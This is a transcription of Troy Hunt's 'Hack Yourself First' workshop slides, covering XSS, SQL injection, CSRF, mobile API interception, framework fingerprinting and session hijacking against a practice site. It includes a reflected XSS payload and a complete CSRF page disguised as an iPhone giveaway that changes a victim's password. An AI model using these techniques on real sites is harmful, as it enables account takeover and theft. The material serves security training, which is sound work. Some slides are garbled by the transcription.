Hack Yourself First. Troy troyhunt.com

Transcription

1 Hack Yourself First Troy troyhunt.com

2 We re gonna turn you into lean, mean hacking machines!

3 Because if we don t, these kids are going to hack you Jake Davies, 19 (and his mum) Ryan Cleary, 20 (and his mum) Curtis Gervais, 16, awaiting trial (probably with his mum)

4 Who are we protecting our assets from? $10.8B per annum Hacker Resources Can invest where ROI makes sense Pocket money Hacker Competency Bored kids Common Thieves Super Hackers

5 Your Hacker Tools for Today A Wi-Fi connection A mobile device you can configure a proxy on I have a few spares Google Chrome Or another browser with good dev tools Fiddler getfiddler.com Or another HTTP proxy like charlesproxy.com

6 What we ll be covering Introduction 30 mins 09:00 Discovering risks via the browser 30 mins 09:30 Using an HTTP proxy 30 mins 10:00 Break 15 mins 10:30 XSS 50 mins 10:45 SQL injection 55 mins 11:35 Lunch 1 hour 12:30 Mobile APIs 60 mins 13:30 CSRF 50 mins 14:30 Break 15 mins 15:20 Framework disclosure 30 mins 15:35 Session hijacking 35 mins 16:05 Wrap up 20 mins 16:40 Close 17:00

7 Exercise 1 Discovering risks via the browser

8 Exercise 1 Chrome developer tools Familiarise yourself with the dev tools Elements, network, cookies, console, por uh, incognito Create an account at hackyourselffirst.troyhunt.com Hacker Challenge 1: Identify three security risks with the registration process

9 Exercise 2 Using an HTTP proxy

10 Exercise 2 Using an HTTP proxy Familiarise yourself with Fiddler Watch requests and their headers, review response body and headers, use the composer to reissue request Hacker Challenge 2: Use Fiddler to vote multiple times on 1 car with your ID

11 Exercise 3 Reflected cross site scripting (XSS)

12 Understanding XSS mysite.com/?q=<script>alert('yay mysite.com/?q=ferrari XSS!');</script> <p>you searched for <%= Request.QueryString["q"] %></p> <p>you searched <p>you for <script>alert('yay searched for ferrari</p> XSS!');</script></p>

13 Some quick XSS tips Check the encoding context You encode for HTML differently than for JavaScript Check the encoding consistency Often it s manual and some characters are not encoded Play with JavaScript to: Manipulate the DOM, access cookies, load external resources

14 Exercise 3 XSS Establish the encoding practices on the search page What s encoded, what s not, what contexts are encoding What can be accessed or manipulated in the DOM Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site

15 Exercise 3 solution ');document.location='

16 Exercise 4 SQL injection (SQLi)

17 Understanding SQLi mysite.com/?id=foo mysite.com/?id=1 var query = "SELECT * FROM Widget WHERE Id = " query += Request.Query["id"] SELECT ** FROM Widget WHERE Id Id = = foo 1 Invalid column name 'foo'

18 Some quick SQLi tips Think of SQL commands which disclose structure sys.tables, sys.columns, system commands Consider how you d enumerate through records Select top x rows asc then top 1 rows from that desc Write out how you think the query works internally SELECT * FROM Supercar ORDER BY [URL param]

19 Exercise 4 SQLi Explore the database using error-based SQLi Construct strings to disclose internal data Cast things to invalid types to disclose via exceptions Hacker Challenge 4: Discover the version of the DB

20 Exercise 4 solution

21 Exercise 5 Mobile APIs

22 Understanding mobile APIs

23 Who are we protecting our APIs from? HTTP(S) Attacker Attacker

24 Trusting the Fiddler root cert

25 Some quick mobile API tips Look at the HTTP requests for sensitive data Credentials, account info, PII Remove the proxy s root cert and make HTTPS requests Is cert validation actually enabled in the app? In your own apps: Parameter tampering, auth bypass, direct object refs

26 Exercise 5 Mobile APIs Proxy your device through Fiddler or Charles Inspect the traffic of your apps Perform normal activities and monitor requests Hacker Challenge 5: Find three things of interest doesn t have to be security related

27 Exercise 6 Cross site request forgery (CSRF)

28 Understanding CSRF POST /Login/Account Set-Cookie: AuthCookie=XXX GET /Path/To/Authenticated/Resource Cookie: AuthCookie=XXX CSRF here! Authenticated request!

29 Some quick CSRF tips Establish the request pattern to the target resource What fields are being sent Reconstruct the request from your own resource Normally a malicious page Lure the user into the malicious resource Usually requires incentivisation

30 Exercise 6 CSRF Mount your own CSRF attack Reproduce a legitimate request Use it to perform a malicious action Hacker Challenge 6: Change the present user s password when they load your page

31 Exercise 6 solution

32 Exercise 6 solution <html> <head> <title>win an iphone!!!</title> </head> <body style="text-align: center;"> <h1 style="font-size: 1.7em;">Want to win an iphone? Of course you do! Click the button below and it's yours!!!</h1> <form action=" method="post" target="hiddenframe"> <input type="hidden" name="newpassword" value="hackpword" /> <input type="hidden" name="confirmpassword" value="hackpword" /> <input type="submit" value="i wanna win!" onclick="alert('you won! Click ok and it\'s done')" style="font-size: 2em;" /> </form> <p><img src="iphone.jpg" style="width: 900px;" /></p> <iframe name="hiddenframe" style="display: none;"></iframe> </body> </html>

33 Exercise 7 Framework disclosure

34 Understanding framework disclosure risks Learn of framework vulnerability Search web for vulnerable sites Pwn!

35 Some quick framework disclosure tips There are multiple ways the framework is leaked This can differ by web stack Different requests can cause different leakage Consider the different ways in which a site may responds Also think about other ways disclosure happens Markup structure, naming patterns, etc

36 Exercise 7 Framework disclosure Discover the internal framework of the site Identify what s being implicitly leaked Cause the app to leak additional information Hacker Challenge 7: Identify 3 different ways in which the internal framework is disclosed

37 Exercise 7 solution 1. Response headers (server, powered by, ASP.NET version, MVC version) 2. Unhandled exception stack trace (includes minor ASP.NET version) 3. Session ID cookie name (ASP.NET_SessionId) 4. Error page for 404 (includes minor ASP.NET version) 5. Elmah 6. HTTP fingerprinting

38 HTTP field ordering Apache HTTP/ OK Date: Sun, 15 Jun :10:49 GMT Server: Apache/ Last-Modified: Thu, 27 Feb 2003 ETag: "32417-c4-3e5d8a83" Accept-Ranges: bytes Content-Length: 196 Connection: close Content-Type: text/html IIS 5.0 HTTP/ OK Server: Microsoft-IIS/5.0 Content-Location: Date: Fri, 01 Jan :13:52 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 ETag: W/"e0d362a4c335be1:ae1" Content-Length: 133

39 Other fingerprinting indicators Forbidden resource Improper HTTP version Improper protocol

40 Exercise 8 Session hijacking

41 Understanding session hijacking POST /Login/Account Set-Cookie: AuthCookie=XXX Attacker steals the cookie Attacker issues authenticated request with the cookie

42 Some quick session hijacking tips Persistence over HTTP can be done multiple ways Cookie, URL Session or auth ID can be obtained multiple ways Insecure transport, referrer, stored in exceptions, XSS Factors that limit hijacking Short duration expiry, keyed to client device / IP

43 Exercise 8 Session hijacking Mount a session hijacking attack Identify how auth is being persisted Obtain the auth token using a vuln in the app Hacker Challenge 8: Use an XSS risk to obtain the auth token and recreate the session in another browser